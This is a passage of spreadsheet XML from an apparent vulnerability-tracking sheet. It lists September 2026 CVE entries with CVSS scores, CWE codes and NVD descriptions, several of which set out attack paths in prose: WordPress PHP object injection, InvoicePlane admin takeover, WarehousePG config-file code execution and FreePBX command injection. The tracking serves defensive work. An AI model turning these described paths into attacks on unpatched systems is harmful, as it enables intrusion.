      </c>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S51" s="5" t="inlineStr">
        <is>
          <t>The ConvertPlus plugin for WordPress is vulnerable to Deserialization of Untrusted Data in all versions up to, and including, 3.6.3 via the style parameter of the cp_display_preview_modal AJAX action. The vulnerability exists because the action's nonce guard is gated behind an isset() check and fails open when the cp_admin_page_nonce parameter is omitted entirely, no capability check is performed on the callback, and sanitize_text_field() — applied to the $style value before it is concatenated directly into a shortcode string evaluated by do_shortcode() — does not strip shortcode delimiters, allowing an attacker to inject a second, fully attacker-controlled [smile_modal] invocation that causes smile_modal_popup() to pass attacker-supplied base64-decoded bytes to maybe_unserialize() with no allowed_classes restriction. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject a PHP object.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t>
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87741</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88808</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr">
        <is>
          <t>rust, suse</t>
        </is>
      </c>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="S52" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified within Rancher Manager where the Fleet agent wrote resources to downstream clusters using its own cluster-admin credentials instead of the ServiceAccount pinned to the deployment. It affects multi-tenancy environments where different tenants share the same downstream clusters, for example different privileged or untrusted teams inside the same organization. This could lead to overwritten configuration files.
This issue affected SUSE Rancher Fleet 0.16 before 0.16.2, 0.15 before 0.15.7, and 0.14 before 0.14.11.</t>
        </is>
      </c>
      <c r="T52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88808</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90926</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr"/>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S53" s="5" t="inlineStr">
        <is>
          <t>Improper Control of Generation of Code ('Code Injection') vulnerability in Innotim Software, Telecommunications and Consultancy Trade Ltd. Co. Logsign SIEM allows Code Injection.
This issue affects Logsign SIEM: from 6.4.101 before 6.4.117.</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90926</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100371</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S54" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. In version 1.7.2, an authorization guard to Users::change_password(), was added to address a previous authorization flaw that allowed a secondary administrator (user_type=1, user_id != 1) to directly change the password of the primary administrator (user_id=1) through users/change_password/{id}. That remediation, however, protects only the direct password-change operation. It does not protect the identity attribute that password recovery actually trusts: user_email. Users::form() applies no equivalent object-level authorization check when editing the primary administrator's account, and user_email is not included in PROTECTED_FIELDS. A secondary administrator can therefore rewrite the primary administrator's email address, then drive the public password-recovery flow — which resolves the account by user_email — to receive the reset token and take over user_id=1. The result is an alternate attack path that achieves the same impact PR #1638 was intended to prevent: cross-administrator full account takeover of the primary administrator. This issue has been patched via commit 8616fa4.</t>
        </is>
      </c>
      <c r="T54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100371</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48100</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr"/>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>CWE-349</t>
        </is>
      </c>
      <c r="S55" s="5" t="inlineStr">
        <is>
          <t>Payy is an Ethereum L2 zk-rollup for privacy preserving and regulatory compliant transactions. Prior to version 1.3.0, agg_agg forwards the compacted message stream from its inner proofs into a public messages: [Field; 1000] array, but it never checks that the unused tail of the outer array is zero. A registered prover can build a valid agg_final proof for an approved rollup block while inserting an extra burn message after the real messages. RollupV1.verifyRollup() then parses that public input as a normal burn and transfers USDC from the rollup contract to the attacker. This is a severe circuit soundness failure: the proof system accepts a public statement whose messages array is not fully derived from the verified inner proofs. On the current deployment, verifyRollup() is restricted to the existing allowlisted prover, so a fresh public caller cannot submit the invalid proof directly. That gate limits who can reach L1 today; it does not make the circuit statement sound. The issue becomes permissionless under the prover model described in the Payy whitepaper. Section 3.3.2 states: "To join as a prover, the prover is required to submit a small stake", and Section 3.3.1 states that if a prover fails to submit, "other nodes can submit the block proof instead." In that model, an attacker only needs to become a registered prover and use public validator approval data for an already approved block. This issue has been patched in version 1.3.0.</t>
        </is>
      </c>
      <c r="T55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48100</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54675</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-434, CWE-73</t>
        </is>
      </c>
      <c r="S56" s="5" t="inlineStr">
        <is>
          <t>FreePBX is an open source IP PBX. Prior to versions 16.0.10 and 17.0.5, a critical vulnerability exists in the sound language upload and conversion functionality that allows an authenticated attacker to perform arbitrary file writes, leading directly to remote code execution (RCE). Authentication with a known username is required. The vulnerability stems from insufficient path sanitization in the file conversion process, enabling path traversal attacks that place malicious PHP files in the web server's root directory. This issue has been patched in versions 16.0.10 and 17.0.5.</t>
        </is>
      </c>
      <c r="T56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54675</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95104</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S57" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow vulnerability exists in BUFFALO Wi-Fi products. A non-authenticated crafted HTTP request may cause a denial-of-service (DoS) condition.</t>
        </is>
      </c>
      <c r="T57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95104</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96538</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>20be33e2-bf35-4d13-8fad-18bd2f3e3659</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr">
        <is>
          <t>postgresql, hp</t>
        </is>
      </c>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S58" s="5" t="inlineStr">
        <is>
          <t>WarehousePG (WHPG) 7.x before 7.6.0-WHPG is affected by a missing authorization vulnerability (CWE-862) in the built-in server-side file functions pg_file_write(text,text,bool), pg_file_rename(text,text,text), pg_file_unlink(text), and pg_logdir_ls(). These functions are executable by any authenticated database role with no GRANT required, because the REVOKE that contrib/adminpack applies to the equivalent functions was never carried over to WHPG core when their catalog entries were repointed to the ungated adminpack-derived implementations as part of Greenplum's merge to a PostgreSQL 12 base. A non-superuser can use pg_file_write, pg_file_rename, and pg_file_unlink to create, overwrite (append), rename, and delete files under the data and log directories, and can use pg_logdir_ls() to enumerate log file names. Because postgresql.auto.conf resides in the data directory, a non-superuser can append configuration directives such as shared_preload_libraries or archive_command to it, resulting in arbitrary code execution as the postgres operating system user on the next server restart or configuration reload. WarehousePG 6.x is not affected, as the equivalent functions there enforce a superuser check internally.</t>
        </is>
      </c>
      <c r="T58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96538</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-42002</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>security@ubuntu.com</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr">
        <is>
          <t>express, python</t>
        </is>
      </c>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>CWE-94, CWE-95</t>
        </is>
      </c>
      <c r="S59" s="5" t="inlineStr">
        <is>
          <t>A code injection vulnerability has been discovered in the Robot Operating System 2 (ROS 2) 'ros2topic' command-line tool, affecting all ROS 2 distributions from Crystal Clemmys up to and including Lyrical Luth and Rolling Ridley. The vulnerability lies in the 'hz' verb, which reports the publishing rate of a topic and accepts a user-provided Python expression via the --filter option. This input is passed directly to the eval() function without sanitization, allowing a local user to craft and execute arbitrary code.</t>
        </is>
      </c>
      <c r="T59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-42002</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101002</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S60" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Netcore NBR200V2 1.3.241127.071246. Affected is the function system of the file /usr/bin/network_tools of the component Tools Ping Handler. Performing a manipulation of the argument url results in os command injection. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101002</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54674</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S61" s="5" t="inlineStr">
        <is>
          <t>FreePBX is an open source IP PBX. Prior to versions 16.0.39 and 17.0.7, users authenticated via User Control Panel (UCP) are able to execute arbitrary commands on the PBX as the webserver user (typically asterisk) using specially crafted HTTP strings. Authenticated access to UCP is required. Note that this is often more common for less-privileged users to have UCP access vs. the Administrator Control Panel (ACP) access (which is usually FreePBX higher-level administrator accounts only). Insufficient sanitization of certain URL parameters utilized by UCP did not fully account for malicious strings in these fields. This could result in binaries being executed on the host server by carefully chaining commands. This issue has been patched in versions 16.0.39 and 17.0.7.</t>
        </is>
      </c>
      <c r="T61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54674</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54708</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-94</t>
        </is>
      </c>
      <c r="S62" s="5" t="inlineStr">
        <is>
          <t>FreePBX is an open source IP PBX. Prior to versions 16.0.72 and 17.0.7, a critical vulnerability exists in the FreePBX backup Module that allows authenticated attackers to execute arbitrary code on the server. Authentication with a known username that has sufficient access permissions and/or write access to backup files is required. This vulnerability is caused by improper path sanitization in the backup restore functionality, enabling attackers to upload malicious PHP files to the web root directory. This issue has been patched in versions 16.0.72 and 17.0.7.</t>
        </is>
      </c>
      <c r="T62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54708</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54710</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="inlineStr"/>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-94</t>
        </is>
      </c>
      <c r="S63" s="5" t="inlineStr">
        <is>
          <t>FreePBX is an open source IP PBX. Prior to versions 16.0.40 and 17.0.7, a critical remote code execution (RCE) vulnerability exists in the superfecta module due to unsafe inclusion of arbitrary PHP files, allowing authenticated attackers to execute arbitrary PHP code on the server with the privileges of the web server user. Authentication with a known username is required. The vulnerability is rooted in the options and save_options cases in the Superfecta module's AJAX handler. The code dynamically includes PHP files from the sources/ directory based on user-supplied input. This allows an attacker to execute arbitrary code when combined with arbitrary directory creation (e.g., via the backup module) and file uploads that reveal full paths (e.g., via the soundlang module). This issue has been patched in versions 16.0.40 and 17.0.7.</t>
        </is>
      </c>
      <c r="T63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54710</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75600</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr"/>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S64" s="5" t="inlineStr">
        <is>
          <t>FreePBX is an open source IP PBX. Prior to version 17.0.9, authenticated users who are authorized to access the GraphQL api module interface of FreePBX are able to execute arbitrary shell commands. Authenticated access to the api module is required. The PBX API module's documentation generator accepts an authenticated host parameter and uses it to build a shell command. The code path validates the generated OAuth access token before execution, but it does not validate or escape host. Compromise results in authenticated arbitrary shell command execution as the FreePBX web/PBX service user (typically asterisk.). This issue has been patched in version 17.0.9.</t>
        </is>
      </c>
      <c r="T64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75600</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86530</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q65" s="5" t="inlineStr"/>
